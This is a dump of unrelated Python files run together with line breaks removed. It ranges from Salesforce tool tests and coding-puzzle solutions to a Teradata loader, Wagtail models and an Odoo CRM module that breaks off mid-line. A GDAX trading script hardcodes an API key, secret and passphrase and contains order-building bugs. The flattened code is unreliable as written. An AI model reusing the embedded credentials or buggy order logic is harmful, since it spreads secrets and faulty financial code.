config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') deploy_result = config.connection.project.compile() print deploy_result self.assertTrue(deploy_result.success == True) def test_create_new_apex_trigger(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') deploy_result = config.connection.project.new_metadata( api_name = 'apex_trigger_from_unit_test_123', metadata_type = 'ApexTrigger', apex_trigger_object_api_name = 'Account' ) print deploy_result self.assertTrue(deploy_result.success == True) helper.delete_metadata(config.connection.project.sfdc_client, {'ApexTrigger':['apex_trigger_from_unit_test_123']}) def test_create_new_apex_page(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') deploy_result = config.connection.project.new_metadata( api_name = 'apex_page_from_unit_test_123', metadata_type = 'ApexPage' ) print deploy_result self.assertTrue(deploy_result.success == True) helper.delete_metadata(config.connection.project.sfdc_client, {'ApexPage':['apex_page_from_unit_test_123']}) def test_create_new_apex_component(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') deploy_result = config.connection.project.new_metadata( api_name = 'apex_component_from_unit_test_123', metadata_type = 'ApexComponent' ) print deploy_result self.assertTrue(deploy_result.success == True) helper.delete_metadata(config.connection.project.sfdc_client, {'ApexComponent':['apex_component_from_unit_test_123']}) def do_test_assumptions(self): pass def tearDown(self): try: pass #shutil.rmtree(config.connection.workspace+"/MavensMateUnitTestProject") except: pass if __name__ == '__main__': unittest.main()
import numpy as np import numpy.random as npr import matplotlib.pyplot as plt plt.close('all') plt.rcParams.update({'font.size': 12}) plt.rcParams['font.family'] = 'sans-serif' # Load the training history, calulate stats, then plot hist = np.load('hist_train.npy') print('\n'+"TRAINING:_____________") print("AVERAGE SCORE: %0.3f"%(np.mean(hist))) print("MAX SCORE: %0.3f"%(np.max(hist))) plt.figure() plt.plot(hist,'o') plt.title('Training') plt.xlabel("Epoch") plt.ylabel("Game Score") plt.savefig('results_train.png',dpi = 300) plt.show() # Load the testing history, calulate stats, then plot hist = np.load('hist_test.npy') print('\n'+"FINAL TEST:_____________") print("AVERAGE SCORE: %0.3f"%(np.mean(hist))) print("MAX SCORE: %0.3f"%(np.max(hist))) plt.figure() plt.plot(hist,'o') plt.title('Testing') plt.xlabel("Epoch") plt.ylabel("Game Score") plt.savefig('results_test.png',dpi = 300) plt.show()
# -*- coding: utf-8 -*- """ Created on Sun Jul 21 17:14:23 2019 @author: smorandv """ import numpy as np import pandas as pd import matplotlib.pyplot as plt def rm_ext_and_nan(CTG_features, extra_feature): """ :param CTG_features: Pandas series of CTG features :param extra_feature: A feature to be removed :return: A dictionary of clean CTG called c_ctg """ # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------ c_ctg = {col: (CTG_features[col].apply(pd.to_numeric, args=('coerce',))).dropna() for col in CTG_features if col!=extra_feature} # -------------------------------------------------------------------------- return c_ctg def nan2num_samp(CTG_features, extra_feature): """ :param CTG_features: Pandas series of CTG features :param extra_feature: A feature to be removed :return: A pandas dataframe of the dictionary c_cdf containing the "clean" features """ c_cdf = {} # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------ for key in CTG_features: if key != extra_feature: prev_val = CTG_features[key] curr_val = pd.to_numeric(prev_val,errors='coerce') for i in range(len(curr_val)): while np.isnan(curr_val.values[i]): curr_val.values[i] =np.random.choice(curr_val) c_cdf[key] = curr_val del c_cdf[extra_feature] # ------------------------------------------------------------------------- return pd.DataFrame(c_cdf) def sum_stat(c_feat): """ :param c_feat: Output of nan2num_cdf :return: Summary statistics as a dicionary of dictionaries (called d_summary) as explained in the notebook """ # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------ d_summary={} for key in c_feat: curr_dict = {'Min' : np.amin(c_feat[key]) , 'Max' : np.amax(c_feat[key]), 'Median' : np.median(c_feat[key]), 'Q1' : np.quantile(c_feat[key], 0.25) , 'Q3' : np.quantile(c_feat[key], 0.75)} d_summary.update({key: curr_dict}) # ------------------------------------------------------------------------- return d_summary def rm_outlier(c_feat, d_summary): """ :param c_feat: Output of nan2num_cdf :param d_summary: Output of sum_stat :return: Dataframe of the dictionary c_no_outlier containing the feature with the outliers removed """ c_no_outlier = {} # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------ for key , value in c_feat.items(): c_no_outlier[key]= value[(c_feat[key]<= d_summary[key]['Q3']+1.5*(d_summary[key]['Q3']-d_summary[key]['Q1'])) & (c_feat[key]>= d_summary[key]['Q1']-1.5*(d_summary[key]['Q3']-d_summary[key]['Q1']))] # ------------------------------------------------------------------------- return pd.DataFrame(c_no_outlier) def phys_prior(c_cdf, feature, thresh): """ :param c_cdf: Output of nan2num_cdf :param feature: A string of your selected feature :param thresh: A numeric value of threshold :return: An array of the "filtered" feature called filt_feature """ # ------------------ IMPLEMENT YOUR CODE HERE:----------------------------- filt_feature=c_cdf[feature][c_cdf[feature]<=thresh] # ------------------------------------------------------------------------- return filt_feature def norm_standard(CTG_features, selected_feat=('LB', 'ASTV'), mode='none', flag=False): """ :param CTG_features: Pandas series of CTG features :param selected_feat: A two elements tuple of strings of the features for comparison :param mode: A string determining the mode according to the notebook :param flag: A boolean determining whether or not plot a histogram :return: Dataframe of the normalized/standardazied features called nsd_res """ x, y = selected_feat # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------ import matplotlib.pyplot as plt nsd_res={} if( mode=='none'): nsd_res=CTG_features.to_dict() if(mode=='standard'): nsd_res={x: (CTG_features[x]-np.mean(CTG_features[x]))/np.std(CTG_features[x]) for x in CTG_features} if(mode=='MinMax'): nsd_res = {x: (CTG_features[x]-np.amin(CTG_features[x]))/(np.amax(CTG_features[x])-np.amin(CTG_features[x])) for x in CTG_features} if(mode=='mean'): nsd_res = {x:(CTG_features[x]-np.mean(CTG_features[x]))/(np.amax(CTG_features[x])-np.amin(CTG_features[x])) for x in CTG_features } if(flag): pd.DataFrame(nsd_res)[[x,y]].plot(kind='hist',bins=100) plt.ylabel('Counts') plt.xlabel('Values') plt.title(mode) plt.legend() plt.show() # -------------------------------------------------------------------------- return pd.DataFrame(nsd_res)
from unittest import TestCase from p17.Solution import Solution class TestSolution(TestCase): def test_letterCombinations(self): sol = Solution() self.assertEqual([], sol.letterCombinations("")) self.assertEqual(["a", "b", "c"], sol.letterCombinations("2")) self.assertEqual(["d", "e", "f"], sol.letterCombinations("3")) self.assertEqual(["g", "h", "i"], sol.letterCombinations("4")) self.assertEqual(["j", "k", "l"], sol.letterCombinations("5")) self.assertEqual(["m", "n", "o"], sol.letterCombinations("6")) self.assertEqual(["p", "q", "r", 's'], sol.letterCombinations("7")) self.assertEqual(["t", "u", "v"], sol.letterCombinations("8")) self.assertEqual(["w", "x", "y", "z"], sol.letterCombinations("9")) def test_handle_double_or_more_numbers(self): sol = Solution() self.assertEqual(["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"], sol.letterCombinations("23")) tmp1 = ["adg", "aeg", "afg", "bdg", "beg", "bfg", "cdg", "ceg", "cfg", "adh", "aeh", "afh", "bdh", "beh", "bfh", "cdh", "ceh", "cfh", "adi", "aei", "afi", "bdi", "bei", "bfi", "cdi", "cei", "cfi"] print(tmp1.sort()) self.assertEqual(tmp1, sol.letterCombinations("234")) def test_should_handle_key_1(self): sol = Solution() self.assertEqual([], sol.letterCombinations("1")) self.assertEqual([], sol.letterCombinations("111")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("12")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("21")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("11211")) self.assertEqual(["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"], sol.letterCombinations("11211311"))
import grpc import poetry_pb2 import poetry_pb2_grpc import poetry_gen from concurrent import futures import grpc if __name__ == '__main__': gen = poetry_gen.FullModel() print(gen.predict("poop")) class GeneratePoetryServicer(poetry_pb2_grpc.GeneratePoetryServicer): """Provides methods that implement functionality of GeneratePoetry server.""" def __init__(self): self.full_model = poetry_gen.FullModel() def GeneratePoetry(self, request, context): return self.full_model.predict(request.Text) def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) poetry_pb2_grpc.add_GeneratePoetryServicer_to_server( GeneratePoetryServicer(), server) server.add_insecure_port('localhost:8080') server.start() try: while True: time.sleep(_ONE_DAY_IN_SECONDS) except KeyboardInterrupt: server.stop(0) if __name__ == '__main__': serve()
class Solution: def minDistance(self, word1: str, word2: str) -> int: l1 = len(word1) l2 = len(word2) dp = [[-1 for _ in range(l2 + 1)] for _ in range(l1 + 1)] for i in range(l2 + 1): dp[0][i] = i for j in range(l1 + 1): dp[j][0] = j for i in range(1, l1+1): for j in range(1, l2+1): if word1[i-1] == word2[j-1]: dp[i][j] = dp[i-1][j-1] else: dp[i][j] = min(dp[i-1][j-1], dp[i-1][j], dp[i][j-1]) + 1 return dp[l1][l2] print(Solution().minDistance('intention', 'execution'))
import xmlrpclib import sys import random import time def randint(): return random.randint(2**29, 2**30) proxy = xmlrpclib.ServerProxy("http://{0}:10010/".format(sys.argv[1])) starttime = time.time() ctime = time.time() c = 0 print int(ctime*1000), c while ctime - starttime < 60.0: a = randint() b = randint() res = proxy.add(a,b) ctime = time.time() if res != a+b: print 'error, res!= a+b', res, a+b break c += 1 if c % 1000 == 0: print int(ctime*1000), c ctime = time.time() print int(ctime*1000), c
# -*- coding: utf-8 -*- # # Copyright 2016 Capital One Services, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime from collections import defaultdict from .cmd import * from .connection import * from .constants import * from .encoders import * from .errors import * from .io import * from .logging import * from .sql import * from .types import * from .utils import * __all__ = ['TeradataLoad'] class TeradataLoad(TeradataCmd): """ The class for inserting into Teradata tables using CLIv2. Exposed under the alias :class:`giraffez.Load`. This class should be used for inserting into Teradata tables in all but very large (> ~100k rows) cases. See :class:`~giraffez.cmd.TeradataCmd` for constructor arguments. Meant to be used, where possible, with python's :code:`with` context handler to guarantee that connections will be closed gracefully when operation is complete: .. code-block:: python with giraffez.Load() as load: load.from_file('database.my_table', 'myfile.txt') # continue executing statements and processing results Use in this manner guarantees proper exit-handling and disconnection when operation is completed (or interrupted). """ def from_file(self, table_name, input_file_name, delimiter=None, null=DEFAULT_NULL, date_conversion=False, quotechar='"'): """ Load a text file into the specified :code:`table_name` For most insertions, this will be faster and produce less strain on Teradata than using :class:`~giraffez.load.TeradataMLoad` (:class:`giraffez.MLoad`). Requires that the input file be a properly delimited text file, with a header that corresponds to the target fields for insertion. Valid delimiters include '|', ',', and '\\t' (tab). :param str table_name: The name of the destination table :param str input_file_name: The name of the file to read rows from :param str delimiter: The delimiter used by the input file (or :code:`None` to infer it from the header). :param str quotechar: The character used to quote fields containing special characters, like the delimiter." :param str null: The string used to indicated nulled values in the file (defaults to :code:`'NULL'`). :param bool date_conversion: If :code:`True`, attempts to coerce date fields into a standard format (defaults to :code:`False`). :return: A dictionary containing counts of applied rows and errors :rtype: dict """ with Reader(input_file_name, delimiter=delimiter, quotechar=quotechar) as f: preprocessor = null_handler(null) rows = (preprocessor(l) for l in f) if isinstance(f, CSVReader): self.options("delimiter", f.reader.dialect.delimiter, 1) self.options("quote char", f.reader.dialect.quotechar, 2) elif isinstance(f, JSONReader): self.options("encoding", "json", 1) return self.insert(table_name, rows, fields=f.header, date_conversion=date_conversion) def insert(self, table_name, rows, fields=None, date_conversion=True): """ Insert Python :code:`list` rows into the specified :code:`table_name` :param str table_name: The name of the destination table :param list rows: A list of rows. Each row must be a :code:`list` of field values. :param list fields: The names of the target fields, in the order that the data will be presented (defaults to :code:`None` for all columns in the table). :param bool date_conversion: If :code:`True`, attempts to coerce date fields into a standard format (defaults to :code:`True`). :return: A dictionary containing counts of applied rows and errors :rtype: dict :raises `giraffez.errors.GiraffeEncodeError`: if the number of values in a row does not match the length of :code:`fields` :raises `giraffez.errors.GiraffeError`: if :code:`panic` is set and the insert statement caused an error. """ columns = self.get_columns(table_name) if fields is None: fields = columns.safe_names columns.set_filter(fields) check_input(columns, fields) stats = defaultdict(int) processor = pipeline([ python_to_sql(table_name, columns, date_conversion) ]) def _fetch(): stats['count'] = 0 current_block = "" for row in rows: try: stmt = processor(row) except GiraffeError as error: if self.panic: raise error log.info("Load", error) stats['errors'] += 1 continue if len(current_block + stmt) > CLI_BLOCK_SIZE: yield current_block current_block = "" current_block += stmt stats['count'] += 1 if current_block: yield current_block log.info("Load", "Executing ...") for block in _fetch(): self.execute_many(block, sanitize=True, parallel=True, silent=True) log.info(self.options) return stats
# -*- coding: utf-8 -*- n = int(raw_input()) p = set(filter(lambda x: x, map(int, raw_input().split(' '))[1:])) q = set(filter(lambda x: x, map(int, raw_input().split(' '))[1:])) if len(p | q) >= n: print('I become the guy.') else: print('Oh, my keyboard!')
from django.apps import AppConfig class PolideportivoConfig(AppConfig): name = 'polideportivo'
import requests import base64, hashlib, hmac, time from requests.auth import AuthBase import json def products(): # sandbox api base api_base = 'https://api-public.sandbox.gdax.com' response = requests.get(api_base + '/products') if response.status_code is not 200: raise Exception('Invalid GDAX Status Code: %d' %response.status_code) return response.json() class GDAXRequestAuth(AuthBase): def __init__(self,api_key, secret_key,passphrase): self.api_key = api_key self.secret_key = secret_key self.passphrase = passphrase def __call__(self, request): timestamp = str(time.time()) message = timestamp + request.method + request.path_url + (request.body or '') hmac_key = base64.b64decode(self.secret_key) signature = hmac.new(hmac_key, message.encode('utf-8'),hashlib.sha256) signature_b64 = base64.b64encode(signature.digest()) request.headers.update({ 'CB-ACCESS-SIGN' : signature_b64, 'CB-ACCESS-TIMESTAMP' : timestamp, 'CB-ACCESS-KEY' : self.api_key, 'CB-ACCESS-PASSPHRASE' : self.passphrase, 'Content-Type' : 'application/json' }) return request def buy_market(product_id, size): auth = GDAXRequestAuth(api_key, api_secret, passphrase) order_data = { 'type': 'market', 'side': 'buy', 'product_id': product_id, 'size': size } response = requests.post(api_base + '/orders', data=json.dumps(order_data), auth=auth) if response.status_code is not 200: raise Exception('Invalid GDAX Status Code: %d' % response.status_code) return response.json() def buy_limit(product_id, price, size, time_in_force='GTC', cancel_after=None, post_only=None): auth = GDAXRequestAuth(api_key, api_secret, passphrase) order_data = { 'type': 'market', 'side': 'buy', 'product_id': product_id, 'size': size, 'time_in_force':time_in_force } if 'time_in_force' is 'GTT': order_data['cancel_after'] = cancel_after if 'time_in_force' not in ['IOC','FOK']: order_data['post_only']=post_only response = requests.post(api_base + '/orders',data=json.dumps(order_data), auth=auth) if response.status_code is not 200: raise Exception('Invalid GDAX Status Code: %d' % response.status_code) return response.json() def order_status(order_id): order_url = api_base + '/orders/' + order_id response = requests.get(order_url, auth=auth) if response.status_code is not 200: raise Exception('Invalid GDAX Status Code: %d' % response.status_code) return response.json() if __name__ == "__main__": api_base = 'https://api-public.sandbox.gdax.com' api_key = '637963ff851b6409c3c2c715abfe7ecc' api_secret = 'hmIZU7fjOq50yW/eH+WkCcPh2Wdjqf8Lk4/6/J0PBPCne5bKC1Gj6cznQcGdp0QMI/01dIJVwYweAkIEUm5Twg==' passphrase = 'hobbe$C01N' auth = GDAXRequestAuth(api_key, api_secret, passphrase) order_url = api_base + '/orders' order_data = { 'type': 'market', 'side': 'buy', 'product_id': 'BTC-USD', 'size': '0.01' } response = requests.post(order_url, data=json.dumps(order_data), auth=auth) print(response.json())
Testcase = eval(input()) for i in range(Testcase): enemy = [] guyeok, W = map(int,input().split()) enemy.append(list(map(int,input().split()))) enemy.append(list(map(int,input().split()))) chk = [0 for _ in range(guyeok*2)] hap = 0 orders = [] chk = [0 for _ in range(guyeok*2)] for i in range(guyeok): hap = enemy[0][i] + enemy[0][(i+1)%guyeok] if guyeok > 1 and hap <= W: orders.append([hap,i,(i+1)%guyeok]) hap = enemy[1][i] + enemy[1][(i+1)%guyeok] if guyeok > 1 and hap <= W: orders.append([hap,i + guyeok,(i+1)%guyeok + guyeok]) hap = enemy[0][i] + enemy[1][i] if hap <= W: orders.append([hap,i,i + guyeok]) orders.sort(reverse=True) cnt = 0 for i in orders: if chk[i[1]-1] == 0 and chk[i[2]-1] == 0: chk[i[1]-1] = 1 chk[i[2]-1] = 1 cnt += 1 print(cnt+(guyeok-cnt)*2)
from __future__ import absolute_import, unicode_literals from django.db import models from django import forms from wagtail.wagtailcore.models import Page from wagtail.wagtailcore.fields import StreamField from wagtail.wagtailadmin.edit_handlers import FieldPanel, StreamFieldPanel from wagtail.wagtailcore.blocks import CharBlock, FieldBlock, RawHTMLBlock, RichTextBlock, \ StreamBlock, StructBlock, TextBlock from wagtail.wagtailimages.blocks import ImageChooserBlock from wagtail.wagtaildocs.blocks import DocumentChooserBlock from wagtail.wagtailsearch import index # Streamfield definition class ImageFormatChoiceBlock(FieldBlock): field = forms.ChoiceField(choices=( ('left', 'Wrap left'), ('right', 'Wrap right'), ('mid', 'Mid width'), ('full', 'Full width'), )) class HTMLAlignmentChoiceBlock(FieldBlock): field = forms.ChoiceField(choices=( ('normal', 'Normal'), ('full', 'Full width'), )) class AlignedHTMLBlock(StructBlock): html = RawHTMLBlock() alignment = HTMLAlignmentChoiceBlock() class ImageBlock(StructBlock): image = ImageChooserBlock() caption = RichTextBlock() alignment = ImageFormatChoiceBlock() class PullQuoteBlock(StructBlock): quote = TextBlock("quote title") attribution = CharBlock() class HomeStreamBlock(StreamBlock): h2 = CharBlock(icon="title", classname="title") h3 = CharBlock(icon="title", classname="title") h4 = CharBlock(icon="title", classname="title") intro = RichTextBlock(icon="pilcrow") paragraph = RichTextBlock(icon="pilcrow") aligned_image = ImageBlock(label="Aligned image", icon="image") pullquote = PullQuoteBlock(icon="openquote") aligned_html = AlignedHTMLBlock(icon="code", label='Raw HTML') document = DocumentChooserBlock(icon="doc-full-inverse") class HomePage(Page): body = StreamField(HomeStreamBlock()) search_fields = Page.search_fields + [ index.SearchField('body'), ] content_panels = Page.content_panels + [ StreamFieldPanel('body'), ] class Meta: verbose_name = "Homepage"
class Vrtx: def __init__(self, n): self.name = n self.data = {} self.data['neighbours'] = list() self.data['edges'] = list() def add_neighbours(self, v): if v not in self.data['neighbours']: self.data['neighbours'].append(v) self.data['neighbours'].sort() class Graph: def __init__(self): self.vertices = {} def add_vertices(self, vrt): if isinstance(vrt, Vrtx) and vrt.name not in self.vertices: self.vertices[vrt.name] = vrt.data['neighbours'] def add_edge(self, vrt, u, v): if isinstance(vrt, Vrtx) and vrt.name in self.vertices and vrt.name in (u, v): vrt.data['edges'].append((u, v)) def print_graph(self, vrt): print(vrt.data) print(self.vertices) v = Vrtx('A') v.add_neighbours('B') v.add_neighbours('C') v.add_neighbours('D') g = Graph() g.add_vertices(v) g.add_edge(v, 'C', 'D') g.add_edge(v, 'A', 'D') g.add_edge(v, 'A', 'B') g.print_graph(v)
n_sets = int(input()) for _ in range(n_sets): x, y = map(int, input().split()) delta = x - y if delta != 1: print("YES") else: print("NO")
import pytest from long_running.notification_mixins import ( ASGINotificationMixin, NullNotificationMixin, ) @pytest.fixture def fake_rekord(): class FakeRekord(ASGINotificationMixin): pk = 500 return FakeRekord() def test_ASGINotificationMixin_asgi_channel_name(fake_rekord): assert fake_rekord.asgi_channel_name == "500" def test_ASGINotificationMixin_send_notification(fake_rekord, mocker): from notifications import core mocker.patch("notifications.core.send_notification") fake_rekord.send_notification("msg") core.send_notification.assert_called_once_with("500", 20, "msg") def test_ASGINotificationMixin_send_progress(fake_rekord, mocker): from notifications import core mocker.patch("notifications.core._send") fake_rekord.send_progress(20) core._send.assert_called_once() @pytest.mark.django_db def test_ASGINotificationMixin_send_processing_finished(fake_rekord, mocker): from notifications import core mocker.patch("notifications.core._send") fake_rekord.send_processing_finished() core._send.assert_called() def tesT_NullNotificationMixin(): x = NullNotificationMixin() x.send_notification() x.send_processing_finished() assert True
import datetime from project import app from project.models import db # Id Expression # 1 = netral, 2 = bahagia, 3 = sedih, 4 = terkejut class Expression(db.Model): __tablename__ = 'expression' id_expression = db.Column(db.Integer, primary_key=True) expression_name = db.Column(db.String(20), nullable=False) created_at = db.Column(db.DateTime, default=datetime.datetime.now()) def __repr__(self): return '<expression {0}>'.format(self.expression_name)
#!/usr/bin/env python # # FFF - Flexible Force Field # Copyright (C) 2010 Jens Erik Nielsen # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Contact information: # Email: Jens.Nielsen_at_gmail.com # Normal mail: # Jens Nielsen # SBBS, Conway Institute # University College Dublin # Dublin 4, Ireland import sys crgfile=sys.argv[1] radfile=sys.argv[2] def get_values(filename): fd=open(filename) lines=fd.readlines() fd.close() data={} count=0 record=False while 1: line=lines[count].strip() if len(line)==0: count=count+1 continue if line[0]=='*': record=True if lines[count].strip()=='#END': break count=count+1 if not record: continue # done=False recordname=lines[count].strip() count=count+1 atoms={} #print 'Got record name',recordname while not done: if len(lines[count].strip())==0: done=True break atom=lines[count].strip().split() atoms[atom[0]]=float(atom[1]) count=count+1 data[recordname]=atoms.copy() return data if __name__=='__main__': crg=get_values(crgfile) rad=get_values(radfile) print '#BEGIN' records=crg.keys() records.sort() for record in records: print '*' print record atoms=crg[record].keys() atoms.sort() for atom in atoms: charge=crg[record][atom] radius=rad[record][atom] print '%5s %6.3f %6.3f' %(atom,charge,radius) print print '#END'
# -*- coding: utf-8 -*- from openerp import models, fields, api from openerp.exceptions import except_orm from datetime import datetime from openerp.tools.translate import _ import openerp.addons.decimal_precision as dp class panipat_crm_lead(models.Model): _name = "panipat.crm.lead" _rec_name = 'sequence' _order = 'sequence desc' def _get_custom_company_default(self): value= self.env.user.company_id #print value return value def _get_amount_paid(self): amount_paid=0.0 for rec_self in self: rec_self.total_paid_amount = -1*rec_self.partner_id.credit if rec_self.partner_id and rec_self.partner_id.credit and rec_self.partner_id.credit<=0 else 0.00 def lead_amount_paid_records(self,cr,uid,id,context=None): obj = self.browse(cr,uid,id,context=None) abc=(obj.sequence or '') + (obj.order_group and ':') + (obj.order_group and obj.order_group.name or '') +':'+'ADVANCE (lead)' print "-=-=-=-=-=",abc return { 'view_type': 'form', 'view_mode': 'form', 'res_model': 'account.voucher', 'type': 'ir.actions.act_window', 'context': { 'form_view_ref':'account_voucher.view_vendor_receipt_form', 'default_partner_id': obj.partner_id.parent_id.id if obj.partner_id.parent_id else obj.partner_id.id, 'default_name':abc, 'order_group':obj.order_group.id, 'search_disable_custom_filters': False } } def button_quote(self,cr,uid,id,context=None): lead_obj = self.browse(cr,uid,id,context) values=[] vals={} if context is None:context={} if lead_obj.product_line : for i in lead_obj.product_line : values.append((0,0,{'product_id':i.product_id.id, 'name':i.description or self.pool.get('product.product').name_get(cr,uid,[i.product_id.id],context)[0][1] or "", 'product_uom_qty':i.product_uom_qty, 'product_uom':i.product_uom.id, 'price_unit':i.sale_price, })) vals.update({'order_line':values}) if lead_obj.partner_id and lead_obj.partner_id.id: vals.update({'partner_id':lead_obj.partner_id.id}) vals['order_group'] = lead_obj.order_group.id vals['origin']=lead_obj.sequence vals['client_order_ref']=lead_obj.client_order_ref print "---------vals in make_qutaion ==========",vals quotation_id = self.pool.get('sale.order').create(cr,uid,vals,context=None) self.write(cr,uid,id,{'state':'quotation','sale_order':quotation_id},context=None) return { 'name': 'Sale Order Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'sale.order', 'type': 'ir.actions.act_window', 'res_id': quotation_id, } def view_quotation(self,cr,uid,id,context=None): vals = {} obj = self.browse(cr,uid,id,context=None) sale_id = obj.sale_order if sale_id : return { 'name': 'Sale Order Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'sale.order', 'type': 'ir.actions.act_window', 'res_id': sale_id.id, } else : return { 'type': 'ir.actions.client', 'tag': 'action_warn', 'name': 'Warning', 'params': { 'title': 'Warning!', 'text': 'Quotation is not available or has been deleted .', } } def button_install(self,cr,uid,id,context=None): lead_obj = self.browse(cr,uid,id,context) values=[] vals={} vals['customer']=lead_obj.partner_id.id vals['order_group']=lead_obj.order_group.id vals['origin']=lead_obj.sequence if lead_obj.product_line : for i in lead_obj.product_line : values.append((0,0,{'product_id':i.product_id.id, 'name':i.description or self.pool.get('product.product').name_get(cr,uid,[i.product_id.id],context=context)[0][1] or "", 'product_uom':i.product_uom.id, 'product_uom_qty':i.product_uom_qty, })) vals.update({'product_lines':values}) install_id=self.pool.get('panipat.install').create(cr,uid,vals,context=None) self.write(cr,uid,id,{'state':'install','install_id':install_id},context=None) return { 'name': 'Installation Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'panipat.install', 'type': 'ir.actions.act_window', 'res_id': install_id, } def view_install_job(self,cr,uid,id,context=None): vals = {} obj=self.browse(cr,uid,id,context=None) install_id = obj.install_id if install_id: return { 'name': 'Installation Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'panipat.install', 'type': 'ir.actions.act_window', 'res_id': obj.install_id.id, } else : return { 'type': 'ir.actions.client', 'tag': 'action_warn', 'name': 'Warning', 'params': { 'title': 'Warning!', 'text': 'Install Job is not available or has been deleted .', } } def button_confirm(self,cr,uid,id,context=None): lead_obj=self.browse(cr,uid,id,context) vals={'state':'confirm'} if lead_obj.sequence in ('draft','/'):vals['sequence']=self.pool.get('ir.sequence').get(cr,uid,'CRM.Lead.Order.No',context) or '/' if not lead_obj.order_group:vals['order_group']=self.pool.get('panipat.order.group').create(cr,uid,{'partner_id':lead_obj.partner_id.id,'created_on':lead_obj.creation_date},context) employee_ids=map(int,self.browse(cr,uid,id).employee_line or []) self.pool.get('panipat.employee.schedule').create_employee_from_schedule(cr,uid,employee_ids,override_vals={'state':'confirm','origin':lead_obj.sequence or '/'},context=context) self.write(cr,uid,id,vals,context=None) if lead_obj.order_group: self.pool.get("panipat.order.group").write(cr,uid,lead_obj.order_group.id,{'custom_company':lead_obj.custom_company.id},context=context) return True def button_to_draft(self,cr,uid,id,context=None): self.write(cr, uid, id, {'state':'draft'}, context) return True def unlink(self,cr,uid,ids,context=None): for id in ids: obj=self.browse(cr, uid, id, context) if obj.state!='cancel': raise except_orm(('Error'),('Cancel the record before deleting it !!')) return super(panipat_crm_lead, self).unlink(cr,uid,ids,context) def button_cancel(self,cr,uid,id,context=None): obj=self.browse(cr, uid, id, context) if obj.install_id: if obj.install_id.state not in ('cancel'): raise except_orm(('Error'),('Cancel the Install Job %s before cancelling this record !!'%(obj.install_id.name_get()[0][1]))) self.pool.get('panipat.install').unlink(cr,uid,obj.install_id.id,context) if obj.sale_order: if obj.sale_order.state not in ('cancel'): warning_id=self.pool.get('warning.wizard').create(cr,uid,{'sale_order':obj.sale_order.id},context=context) return { 'name': 'Warning Wizard', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'warning.wizard', 'type': 'ir.actions.act_window', 'res_id': warning_id, 'target':'new', 'context':{'check':'lead','form_view_ref':'panipat_handloom.warning_wizard_sale_view'} } else: self.pool.get('sale.order').unlink(cr,uid,[obj.sale_order.id],context=context) schedule_ids=map(int,obj.employee_line or []) self.pool.get('panipat.employee.schedule').cancel_employee_from_schedule(cr,uid,schedule_ids,context) self.pool.get('panipat.employee.schedule').delete_employee_from_schedule(cr,uid,schedule_ids,context) self.write(cr, uid, id, {'state':'cancel'}, context=context) return True def after_lead_cancel(self,cr,uid,id,context=None): obj=self.browse(cr, uid, id, context) if obj.sale_order: self.pool.get('sale.order').write(cr, uid, obj.sale_order.id,{'order_group':False}, context=context) self.write(cr, uid, id, {'sale_order':False}, context) schedule_ids=map(int,obj.employee_line or []) self.pool.get('panipat.employee.schedule').cancel_employee_from_schedule(cr,uid,schedule_ids,context) self.pool.get('panipat.employee.schedule').delete_employee_from_schedule(cr,uid,schedule_ids,context) self.write(cr, uid, id, {'state':'cancel'}, context=context) return True @api.one @api.depends('partner_id') def _get_partner_details(self): for rec in self: if rec.partner_id: partner = rec.partner_id if partner.parent_id: rec.partner_name = partner.parent_id.name elif partner.is_company: rec.partner_name = partner.name else: rec.partner_name = '' rec.contact_name = partner.name if partner.parent_id else False rec.title = partner.title and partner.title.id or False rec.street = partner.street rec.street2 = partner.street2 rec.city = partner.city rec.state_id = partner.state_id and partner.state_id.id or False rec.country_id = partner.country_id and partner.country_id.id or False rec.email_from = partner.email rec.phone = partner.phone rec.mobile = partner.mobile rec.fax = partner.fax rec.zip = partner.zip rec.user_id = partner.user_id and partner.user_id.id or False @api.multi def write(self,vals): print "in write crm.lead self,vals--",self,vals for rec in self: if vals.get('creation_date',False): if rec.order_group: rec.order_group.created_on=vals['creation_date'] return_check = super(panipat_crm_lead, self).write(vals) for rec in self: if rec.state not in ('draft','cancel') and vals.get('employee_line'): rec.employee_line.cancel_employee_from_schedule() rec.employee_line.delete_employee_from_schedule() rec.employee_line.create_employee_from_schedule(override_vals={'state':'confirm','origin':rec.sequence or 